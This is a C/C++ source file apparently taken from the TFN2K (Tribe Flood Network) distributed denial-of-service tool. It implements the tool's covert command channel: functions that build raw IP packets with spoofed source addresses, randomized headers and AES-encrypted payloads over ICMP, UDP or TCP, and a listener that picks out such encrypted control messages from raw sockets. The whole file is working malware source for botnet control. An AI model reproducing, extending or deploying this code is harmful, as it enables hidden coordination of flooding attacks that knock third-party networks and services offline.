#include "../mix/net.h"
#include "../mix/mix.h"

int
isip (char *ip)
{
  int a, b, c, d;
  if (!sscanf (ip, "%d.%d.%d.%d", &a, &b, &c, &d))
    return 0;
  if (a < 1)
    return 0;
  if (a > 255)
    return 0;
  if (b < 0)
    return 0;
  if (b > 255)
    return 0;
  if (c < 0)
    return 0;
  if (c > 255)
    return 0;
  if (d < 0)
    return 0;
  if (d > 255)
    return 0;
  return 1;
}

unsigned long
resolve (char *host)
{
  struct hostent *he;
  struct sa tmp;
  if (isip (host))
    return (inet_addr (host));
  he = gethostbyname (host);
  if (he)
    {
      memcpy (&tmp.add, he->h_addr, he->h_length);
    }
  else
    return (0);
  return (tmp.add);
}

char *
ntoa (unsigned int in)
{
  struct in_addr ad;
  ad.s_addr = in;
  return (inet_ntoa (ad));
}

/* I am RFC1071 compliant... :P */

unsigned short
sum (unsigned short *buf, int nwords)
{
  unsigned long sum;
  for (sum = 0; nwords > 0; nwords--)
    sum += *buf++;
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return ~sum;
}

int
incip (char *ip)
{
  int a, b, c, d;
  sscanf (ip, "%d.%d.%d.%d", &a, &b, &c, &d);

  if (a >= 255)
    return 0;
  if (b >= 255)
    {
      b = 0;
      a++;
    }
  if (c >= 255)
    {
      c = 0;
      b++;
    }
  if (d >= 255)
    {
      d = 0;
      c++;
    }
  else d++;

  sprintf (ip, "%d.%d.%d.%d", a, b, c, d);

  return 1;
}

int
decip (char *ip)
{
  int a, b, c, d;
  sscanf (ip, "%d.%d.%d.%d", &a, &b, &c, &d);

  if (a <= 0)
    return 0;
  if (b <= 0)
    {
      b = 255;
      a++;
    }
  if (c <= 0)
    {
      c = 255;
      b++;
    }
  if (d <= 0)
    {
      d = 255;
      c++;
    }

  d--;

  sprintf (ip, "%d.%d.%d.%d", a, b, c, d);

  return 1;
}

int
rawsock (int protocol)
{
  int one = 1, fd = socket (PF_INET, SOCK_RAW, protocol);
  const int *val = &one;
  if (fd < 0)
    return -1;
  else if (setsockopt (fd, IP, MY_HDRINCL, val, sizeof (one)) < 0)
    {
      close (fd);
      return -1;
    }
  return fd;
}

void
tfntransmit (unsigned long from, unsigned long to, int proto, char *payload)
{
  char *buf = new char[bufsize], *data, *p, *ctmp;
  struct ip *ih = (struct ip *) buf;
  struct icmp *ich = (struct icmp *) (buf + sizeof (struct ip));
  struct udp *udh = (struct udp *) (buf + sizeof (struct ip));
  struct tcp *tch = (struct tcp *) (buf + sizeof (struct ip));
  struct sa sin;
  int tot_len = sizeof (struct ip), ssock, i;

  data = new char[bufsize];

  memset (buf, 0, bufsize);
  memset (data, 0, bufsize);

  data[0] = (char) getrandom (33, 126);
  data[1] = data[0] + 1;
  data[2] = data[0];
  strncpy (data + 3, payload, bufsize - 3);
  i = strlen (data);

  sin.fam = PF_INET;
  sin.add = to;

  ih->ver = 4;
  ih->ihl = 5;
  ih->tos = 0x00;
  ih->tl = 0;
  ih->id = htons (getrandom (1024, 65535));
  ih->off = 0;
  ih->ttl = getrandom (200, 255);
  ih->sum = 0;
  ih->src = from;
  ih->dst = to;

  switch ((proto < 0) ? getrandom (0, 2) : proto)
    {
    case 0:
      tot_len += sizeof (struct icmp);
      ih->pro = ICMP;
      ssock = rawsock (ICMP);
      p = buf + sizeof (struct ip) + sizeof (struct icmp);
      ich->type = 0;
      ich->code = 0;
      ich->id = getrandom (0, 1) ? getrandom (0, 65535) : 0;
      ich->seq = getrandom (0, 1) ? getrandom (0, 65535) : 0;
      ich->sum = 0;
      ctmp = (char *) aes_encrypt ((const u1byte *)data, &i);
      strncpy (p, ctmp, bufsize - 128);
      delete ctmp;
      tot_len += strlen (p);
      ich->sum = sum ((u16 *) ich, tot_len >> 1);
      ih->tl = tot_len;
      sin.dp = htons (0);
      break;
    case 1:
      tot_len += sizeof (struct udp);
      ih->pro = UDP;
      ssock = rawsock (UDP);
      p = buf + sizeof (struct ip) + sizeof (struct udp);
      udh->src = htons (getrandom (0, 65535));
      udh->dst = htons (getrandom (0, 65535));
      udh->sum = 0;
      ctmp = (char *) aes_encrypt ((const u1byte *)data, &i);
      strncpy (p, ctmp, bufsize - 128);
      delete ctmp;
      tot_len += strlen (p);
      udh->sum = sum ((u16 *) udh, tot_len >> 1);
      udh->len = htons (sizeof (struct udp) + 3 + strlen (p));
      ih->tl = tot_len;
      sin.dp = htons (udh->dst);
      break;
    case 2:
      tot_len += sizeof (struct tcp);
      ih->pro = TCP;
      ssock = rawsock (TCP);
      p = buf + sizeof (struct ip) + sizeof (struct tcp);
      tch->src = htons (getrandom (0, 65535));
      tch->dst = htons (getrandom (0, 65535));
      tch->seq = getrandom (0, 1) ? htonl (getrandom (0, 65535) + (getrandom (0, 65535) << 8)) : 0;
      tch->ack = getrandom (0, 1) ? htonl (getrandom (0, 65535) + (getrandom (0, 65535) << 8)) : 0;
      tch->off = 0;
      tch->flg = getrandom (0, 1) ? (getrandom (0, 1) ? SYN : ACK) : SYN | ACK;
      tch->win = getrandom (0, 1) ? htons (getrandom (0, 65535)) : 0;
      tch->urp = 0;
      tch->sum = 0;
      ctmp = (char *) aes_encrypt ((const u1byte *)data, &i);
      strncpy (p, ctmp, bufsize - 128);
      delete ctmp;
      tot_len += strlen (p);
      tch->sum = sum ((u16 *) tch, tot_len >> 1);
      ih->tl = tot_len;
      sin.dp = htons (tch->dst);
      break;
    default:
      exit (0);
      break;
    }

  if (sendto (ssock, buf, tot_len, 0, (struct sockaddr *) &sin, sizeof (sin)) < 0)
    perror ("sendto");

  delete buf;
  delete data;
  close (ssock);
}

char *
tfnread (int rawisock, int rawusock, int rawtsock)
{
  char *buf, *clear, *data, *p = NULL;
  struct tribe *tribeh;
  int i = 0;
  fd_set rfds;

  buf = new char[bufsize];

  FD_ZERO (&rfds);
  FD_SET (rawisock, &rfds);
  FD_SET (rawusock, &rfds);
  FD_SET (rawtsock, &rfds);

  if ((rawisock > rawusock) && (rawisock > rawtsock))
    i = rawisock + 1;
  else if ((rawtsock > rawusock) && (rawtsock > rawisock))
    i = rawtsock + 1;
  else if ((rawusock > rawisock) && (rawusock > rawtsock))
    i = rawusock + 1;

  if (select (i, &rfds, NULL, NULL, NULL) < 1)
    {
      delete buf;
      return NULL;
    }
  memset (buf, 0, bufsize);

  if (FD_ISSET (rawisock, &rfds))
    {
      i =
	read (rawisock, buf,
	      bufsize) - (sizeof (struct ip) + sizeof (struct icmp));
      if (i < 4)
	goto nomatch;
      p = (buf + sizeof (struct ip) + sizeof (struct icmp));
      if (!isprint (p[0]))
	goto nomatch;
      clear = (char *)aes_decrypt ((const u1byte *)p, i);
      tribeh = (struct tribe *) clear;
      if ((tribeh->start == tribeh->end) && (tribeh->id == tribeh->start + 1))
	{
	  data = new char[strlen(clear)];
	  strcpy (data, clear + sizeof (struct tribe));
          delete clear;
          delete buf;
	  return data;
	}
    }
  memset (buf, 0, bufsize);

  if (FD_ISSET (rawtsock, &rfds))
    {
      i =
	read (rawtsock, buf,
	      bufsize) - (sizeof (struct ip) + sizeof (struct tcp));
      if (i < 4)
	goto nomatch;
      p = (buf + sizeof (struct ip) + sizeof (struct tcp));
      if (!isprint (p[0]))
	goto nomatch;
      clear = (char *)aes_decrypt ((const u1byte *)p, i);
      tribeh = (struct tribe *) clear;
      if ((tribeh->start == tribeh->end) && (tribeh->id == tribeh->start + 1))
	{
	  data = new char[strlen(clear)];
	  strcpy (data, clear + sizeof (struct tribe));
          delete clear;
          delete buf;
	  return data;
	}
    }
  memset (buf, 0, bufsize);

  if (FD_ISSET (rawusock, &rfds))
    {
      i = read (rawusock, buf,
		bufsize) - (sizeof (struct ip) + sizeof (struct udp));
      if (i < 4)
	goto nomatch;
      p = (buf + sizeof (struct ip) + sizeof (struct udp));
      if (!isprint (p[0]))
	goto nomatch;
      clear = (char *)aes_decrypt ((const u1byte *)p, i);
      tribeh = (struct tribe *) clear;
      if ((tribeh->start == tribeh->end) && (tribeh->id == tribeh->start + 1))
	{
	  data = new char[strlen(clear)];
	  strcpy (data, clear + sizeof (struct tribe));
          delete clear;
          delete buf;
	  return data;
	}
    }

nomatch:
  delete buf;
  return NULL;
}
